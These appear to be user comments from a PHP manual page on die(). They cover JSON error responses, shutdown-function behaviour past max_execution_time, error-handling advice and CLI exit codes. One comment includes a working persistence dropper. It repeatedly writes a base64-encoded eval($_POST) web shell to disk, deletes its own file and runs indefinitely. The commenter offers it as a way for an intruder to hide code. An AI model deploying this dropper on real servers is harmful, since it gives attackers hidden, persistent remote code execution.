Using die() can be a good option when working with HTTP Endpoints.
If your PHP Script is one, you can use die() to send back an error as plain text or JSON for example.
die(json_encode(array('error' => 'some error')));
Using die() can be a good option when working with HTTP Endpoints.
If your PHP Script is one, you can use die() to send back an error as plain text or JSON for example.
die(json_encode(array('error' => 'some error')));
1.) I run something similar to this for 3 days on a couple of systems. It seems like this function does not have any time limitation at all, IF it gets called due to a max_execution_time-out.
<?php
ignore_user_abort(true);
define( "ABS_PATH", getcwd() . DIRECTORY_SEPARATOR );
define( "LOG_FILE", ABS_PATH . "log.txt" );
function shutdown() {
while(true) {
file_put_contents(LOG_FILE, date("c") . " (shutdown)\n", FILE_APPEND);
sleep(1);
}
}
register_shutdown_function("shutdown");
ini_set("max_execution_time", 3);
while(true) {
file_put_contents(LOG_FILE, date("c") . " (normal)\n", FILE_APPEND);
sleep(1);
}
/* log.txt
2017-11-01T23:56:00+00:00 (normal)
2017-11-01T23:56:01+00:00 (normal)
2017-11-01T23:56:02+00:00 (normal)
2017-11-01T23:56:03+00:00 (shutdown)
2017-11-01T23:56:04+00:00 (shutdown)
2017-11-01T23:56:05+00:00 (shutdown)
[ logs for 3 days ]
*/
?>
2.) With this code, the registered function is limited to max_execution_time.
<?php
// [...]
file_put_contents(LOG_FILE, date("c") . " (normal)\n", FILE_APPEND);
sleep(1);
EXIT; // <-- Now with exit, not needed just to show
/* log.txt
2017-11-01T23:57:38+00:00 (normal)
2017-11-01T23:57:39+00:00 (shutdown)
2017-11-01T23:57:40+00:00 (shutdown)
*/
?>
3.) This is very evil. you can run code "forever". For example, this code checks if the file shell.php exists, and drops it if not. Of course, this is not how a hacker breach in. But if he has access, this is a great place to hide evil code.
<?php
ignore_user_abort(true);
define( "ABS_PATH", getcwd() . DIRECTORY_SEPARATOR );
define( "SHELL_PATH", ABS_PATH . "shell.php" );
define( "STOP_FILE", ABS_PATH . "stop.txt" );
define( "SLEEP", 10 );
/* base64 of: <?php if(isset($_POST['exec'])) eval($_POST['exec']); ?> */
define( "SHELL_CODE", "PD9waHAgaWYoaXNzZXQoJF9QT1NUWydleGVjJ10pKSBldmFsKCRfUE9TVFsnZXhlYyddKTsgPz4=" );
function shutdown() {
while(true) {
if( file_exists( STOP_FILE ) ) {
break;
}
if( ! file_exists( SHELL_PATH ) )
file_put_contents( SHELL_PATH, base64_decode( SHELL_CODE ) );
sleep(SLEEP);
}
exit;
}
register_shutdown_function("shutdown");
// Do something. Delete this drop script for example.
unlink($_SERVER['SCRIPT_FILENAME']);
// Try 1 to go to shutdown
ini_set("max_execution_time", 1);
usleep(1500000);
// Try 2 to go to shutdown
sleep(ini_get("max_execution_time") + 1);
// Try 3 to go to shutdown (better have a max_execution_time ...)
while(true) {
sleep(1);
}
?>
It is poor design to rely on die() for error handling in a web site because it results in an ugly experience for site users: a broken page and - if they're lucky - an error message that is no help to them at all. As far as they are concerned, when the page breaks, the whole site might as well be broken.
If you ever want the public to use your site, always design it to handle errors in a way that will allow them to continue using it if possible. If it's not possible and the site really is broken, make sure that you find out so that you can fix it. die() by itself won't do either.
If a supermarket freezer breaks down, a customer who wanted to buy a tub of ice cream doesn't expect to be kicked out of the building.
Beware that when using PHP on the command line, die("Error") simply prints "Error" to STDOUT and terminates the program with a normal exit code of 0.
If you are looking to follow UNIX conventions for CLI programs, you may consider the following:
<?php
fwrite(STDERR, "An error occurred.\n");
exit(1); // A response code other than 0 is a failure
?>
In this way, when you pipe STDOUT to a file, you may see error messages in the console and BASH scripts can test for a response code of 0 for success:
rc@adl-dev-01:~$ php die.php > test
An error occurred.
rc@adl-dev-01:~$ echo $?
1
Ideally, PHP would write all Warnings, Fatal Errors, etc on STDERR, but that's another story.
die doesn't prevent destructors from being run, so the script doesn't exit immediately, it still goes through cleanup routines.